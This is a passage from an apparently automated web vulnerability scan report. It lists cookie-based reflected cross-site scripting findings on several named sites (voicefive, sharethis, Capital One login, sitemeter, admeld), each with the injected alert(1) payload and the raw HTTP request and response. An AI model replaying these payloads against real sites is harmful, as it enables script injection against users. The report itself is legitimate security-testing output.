}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "BMX_G": 'method->-1,ts->1311271258bb9ff<script>alert(1)</script>1dc8b182675', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '1', "ar_p98294060":
...[SNIP]...

3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 68388<script>alert(1)</script>e06b9decce1 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-131127126968388<script>alert(1)</script>e06b9decce1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:40 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
"BMX_G": 'method->-1,ts->1311271258', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-131127126968388<script>alert(1)</script>e06b9decce1', "BMX_3PC": '1', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu
...[SNIP]...

3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p101983071 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p101983071 cookie is copied into the HTML document as plain text between tags. The payload 5dffa<script>alert(1)</script>69beef29e58 was submitted in the ar_p101983071 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&5dffa<script>alert(1)</script>69beef29e58; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:37 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
hu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:27 2011&prad=1355335&arc=1498970&', "ar_p101983071": 'exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&5dffa<script>alert(1)</script>69beef29e58' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p110040101 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p110040101 cookie is copied into the HTML document as plain text between tags. The payload c95f7<script>alert(1)</script>6cac0769b07 was submitted in the ar_p110040101 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&c95f7<script>alert(1)</script>6cac0769b07; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:38 2011&c95f7<script>alert(1)</script>6cac0769b07=&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
tExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&c95f7<script>alert(1)</script>6cac0769b07', "ar_p101983071": 'exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.c
...[SNIP]...

3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p87077372 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p87077372 cookie is copied into the HTML document as plain text between tags. The payload f606e<script>alert(1)</script>aeace3a3569 was submitted in the ar_p87077372 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&f606e<script>alert(1)</script>aeace3a3569; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:36 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
ll};})();}COMSCORE.BMX.Broker.Cookies={ "BMX_G": 'method->-1,ts->1311271258', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&f606e<script>alert(1)</script>aeace3a3569', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '1', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=2&in
...[SNIP]...

3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p98294060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p98294060 cookie is copied into the HTML document as plain text between tags. The payload e39ca<script>alert(1)</script>0ee60f18c48 was submitted in the ar_p98294060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&e39ca<script>alert(1)</script>0ee60f18c48; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:36 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
ad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '1', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&e39ca<script>alert(1)</script>0ee60f18c48', "ar_p110040101": 'exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:27 2011&prad=1355335&arc=1498970&', "ar_p101983071": 'exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:4
...[SNIP]...

3.129. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload bbafa<script>alert(1)</script>202899b8423 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.uscgnews.com%2Fgo%2Fdoc%2F786%2F1135035%2F&jsref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&rnd=1311370085769 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.uscgnews.com/go/doc/786/1135035/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==bbafa<script>alert(1)</script>202899b8423

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Fri, 22 Jul 2011 21:28:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 2615


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==bbafa<script>alert(1)</script>202899b8423
userid:
</div>
...[SNIP]...

3.130. https://servicing.capitalone.com/c1/login.aspx [VS_COOKIE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://servicing.capitalone.com
Path:   /c1/login.aspx

Issue detail

The value of the VS_COOKIE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65e16"-alert(1)-"55101615765 was submitted in the VS_COOKIE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c1/login.aspx HTTP/1.1
Host: servicing.capitalone.com
Connection: keep-alive
Referer: http://www.capitalone.com/contactus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; ASP.NET_SessionId=t40lmqeexjtjkkvhq4caiv55; COUNTRYCODE=USA; TestCookie=OK; ssotgt=f2eos; C1_REDIRECT=; SSP_Params=; VS_COOKIE=Login65e16"-alert(1)-"55101615765; bank=dotcom

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Fri, 22 Jul 2011 20:43:41 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: VS_COOKIE=LoginError; domain=capitalone.com; path=/;HttpOnly
Vary: Accept-Encoding
Content-Length: 13852


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="HTMLHEAD">
   <meta http-equiv="Cache-Control" content="no-cache, no-sto
...[SNIP]...
<script language="JavaScript">var attributes = new Array();attributes[0] = "appname=EOS";attributes[1] = "PageName=LoginError";attributes[2] = "PreviousPage=Login65e16"-alert(1)-"55101615765";var appScriptUri = "/C1/Themes/TopTabMenu/Script/null.js";writeAnalytic(attributes, appScriptUri);</script>
...[SNIP]...

3.131. http://sm6.sitemeter.com/js/counter.asp [IP cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sm6.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f4ae"%3balert(1)//edcd6dc1283 was submitted in the IP cookie. This input was echoed as 6f4ae";alert(1)//edcd6dc1283 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.asp?site=sm6damnhippy HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E2436f4ae"%3balert(1)//edcd6dc1283

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:43:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7294
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:53:20 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.2436f4ae";alert(1)//edcd6dc1283";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.132. http://sm6.sitemeter.com/js/counter.js [IP cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sm6.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 914da"%3balert(1)//2b32c6424b3 was submitted in the IP cookie. This input was echoed as 914da";alert(1)//2b32c6424b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=sm6damnhippy HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243914da"%3balert(1)//2b32c6424b3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:19:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7294
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:29:40 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243914da";alert(1)//2b32c6424b3";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.133. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220 [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3487"><script>alert(1)</script>ec6aea0cfca was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

